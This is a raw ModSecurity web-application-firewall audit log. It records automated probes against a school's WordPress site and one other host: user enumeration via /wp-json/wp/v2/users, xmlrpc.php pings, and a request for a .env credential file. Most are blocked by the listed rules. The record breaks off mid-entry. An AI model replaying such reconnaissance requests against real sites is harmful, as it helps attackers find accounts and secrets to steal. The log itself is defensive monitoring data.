Stopwatch: 1747435681426167 3149 (- - -) Stopwatch2: 1747435681426167 3149; combined=1367, p1=427, p2=903, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f42d456-Z-- --a6c2fb2b-A-- [17/May/2025:05:48:07 +0700] aCfApwTOsBn9MSWb6WJtsAAAAIQ 103.236.140.4 41300 103.236.140.4 8181 --a6c2fb2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a6c2fb2b-C-- demo.sayHello --a6c2fb2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6c2fb2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435687495232 5899 (- - -) Stopwatch2: 1747435687495232 5899; combined=4348, p1=558, p2=3567, p3=32, p4=36, p5=93, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6c2fb2b-Z-- --a27f153f-A-- [17/May/2025:05:48:24 +0700] aCfAuBKi5m5upc8uMd6haQAAAMM 103.236.140.4 41342 103.236.140.4 8181 --a27f153f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a27f153f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a27f153f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435704242920 2190 (- - -) Stopwatch2: 1747435704242920 2190; combined=1196, p1=389, p2=779, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a27f153f-Z-- --c0937f2c-A-- [17/May/2025:05:48:29 +0700] aCfAvRKi5m5upc8uMd6hcAAAAM8 103.236.140.4 41356 103.236.140.4 8181 --c0937f2c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c0937f2c-C-- demo.sayHello --c0937f2c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0937f2c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435709297822 4665 (- - -) Stopwatch2: 1747435709297822 4665; combined=3720, p1=443, p2=3079, p3=23, p4=24, p5=89, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0937f2c-Z-- --4f7bf24d-A-- [17/May/2025:05:49:06 +0700] aCfA4gTOsBn9MSWb6WJtuQAAAI8 103.236.140.4 41440 103.236.140.4 8181 --4f7bf24d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4f7bf24d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f7bf24d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435746367762 2832 (- - -) Stopwatch2: 1747435746367762 2832; combined=1222, p1=390, p2=802, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f7bf24d-Z-- --6885ce37-A-- [17/May/2025:05:49:11 +0700] aCfA53yxdQCiyU1ENFcmGQAAABI 103.236.140.4 41456 103.236.140.4 8181 --6885ce37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.48 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6885ce37-C-- demo.sayHello --6885ce37-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6885ce37-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435751359408 4794 (- - -) Stopwatch2: 1747435751359408 4794; combined=3711, p1=444, p2=3067, p3=24, p4=25, p5=89, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6885ce37-Z-- --1788192a-A-- [17/May/2025:05:50:36 +0700] aCfBPBKi5m5upc8uMd6hgwAAANA 103.236.140.4 41594 103.236.140.4 8181 --1788192a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1788192a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1788192a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435836345581 3482 (- - -) Stopwatch2: 1747435836345581 3482; combined=1451, p1=479, p2=941, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1788192a-Z-- --b9072f69-A-- [17/May/2025:05:50:41 +0700] aCfBQRKi5m5upc8uMd6hhQAAANM 103.236.140.4 41600 103.236.140.4 8181 --b9072f69-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b9072f69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9072f69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435841006869 2337 (- - -) Stopwatch2: 1747435841006869 2337; combined=1129, p1=375, p2=722, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9072f69-Z-- --3f0b1a19-A-- [17/May/2025:05:50:41 +0700] aCfBQXyxdQCiyU1ENFcmOgAAAAE 103.236.140.4 41602 103.236.140.4 8181 --3f0b1a19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.56 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f0b1a19-C-- demo.sayHello --3f0b1a19-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f0b1a19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435841521500 5412 (- - -) Stopwatch2: 1747435841521500 5412; combined=4076, p1=514, p2=3344, p3=29, p4=32, p5=93, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f0b1a19-Z-- --7df58e23-A-- [17/May/2025:05:50:45 +0700] aCfBRQTOsBn9MSWb6WJtxQAAAIc 103.236.140.4 41610 103.236.140.4 8181 --7df58e23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7df58e23-C-- demo.sayHello --7df58e23-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7df58e23-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435845682342 5140 (- - -) Stopwatch2: 1747435845682342 5140; combined=3925, p1=479, p2=3240, p3=25, p4=31, p5=89, sr=69, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7df58e23-Z-- --15996653-A-- [17/May/2025:05:51:27 +0700] aCfBbwTOsBn9MSWb6WJtxgAAAIg 103.236.140.4 41618 103.236.140.4 8181 --15996653-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.88 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15996653-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15996653-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435887634981 3518 (- - -) Stopwatch2: 1747435887634981 3518; combined=1483, p1=507, p2=945, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15996653-Z-- --dfa40c04-A-- [17/May/2025:05:51:32 +0700] aCfBdBKi5m5upc8uMd6hiAAAANc 103.236.140.4 41622 103.236.140.4 8181 --dfa40c04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.88 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dfa40c04-C-- demo.sayHello --dfa40c04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfa40c04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435892741919 6050 (- - -) Stopwatch2: 1747435892741919 6050; combined=4323, p1=546, p2=3546, p3=30, p4=34, p5=98, sr=94, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfa40c04-Z-- --f2beb26b-A-- [17/May/2025:05:53:26 +0700] aCfB5um4kjNN-hEbWjI_-AAAAFE 103.236.140.4 41648 103.236.140.4 8181 --f2beb26b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2beb26b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2beb26b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436006275792 3452 (- - -) Stopwatch2: 1747436006275792 3452; combined=1472, p1=493, p2=947, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2beb26b-Z-- --02dd945d-A-- [17/May/2025:05:53:31 +0700] aCfB6-m4kjNN-hEbWjI_-QAAAFI 103.236.140.4 41652 103.236.140.4 8181 --02dd945d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02dd945d-C-- demo.sayHello --02dd945d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02dd945d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436011203639 5032 (- - -) Stopwatch2: 1747436011203639 5032; combined=3770, p1=463, p2=3094, p3=22, p4=24, p5=97, sr=65, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02dd945d-Z-- --737e2b5f-A-- [17/May/2025:05:54:17 +0700] aCfCGRKi5m5upc8uMd6hjgAAAMU 103.236.140.4 41692 103.236.140.4 8181 --737e2b5f-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 138.68.86.32 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 138.68.86.32 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --737e2b5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --737e2b5f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747436057073585 656 (- - -) Stopwatch2: 1747436057073585 656; combined=259, p1=230, p2=0, p3=0, p4=0, p5=29, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --737e2b5f-Z-- --c4d08758-A-- [17/May/2025:05:54:29 +0700] aCfCJem4kjNN-hEbWjJACgAAAFY 103.236.140.4 41698 103.236.140.4 8181 --c4d08758-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c4d08758-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4d08758-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436069802805 3401 (- - -) Stopwatch2: 1747436069802805 3401; combined=1473, p1=495, p2=942, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4d08758-Z-- --344d6752-A-- [17/May/2025:05:54:34 +0700] aCfCKum4kjNN-hEbWjJADAAAAFg 103.236.140.4 41702 103.236.140.4 8181 --344d6752-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.55 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --344d6752-C-- demo.sayHello --344d6752-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --344d6752-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436074712775 6938 (- - -) Stopwatch2: 1747436074712775 6938; combined=4897, p1=631, p2=3999, p3=43, p4=43, p5=108, sr=82, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --344d6752-Z-- --a09f625d-A-- [17/May/2025:05:56:36 +0700] aCfCpOm4kjNN-hEbWjJAEAAAAEg 103.236.140.4 41714 103.236.140.4 8181 --a09f625d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a09f625d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a09f625d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 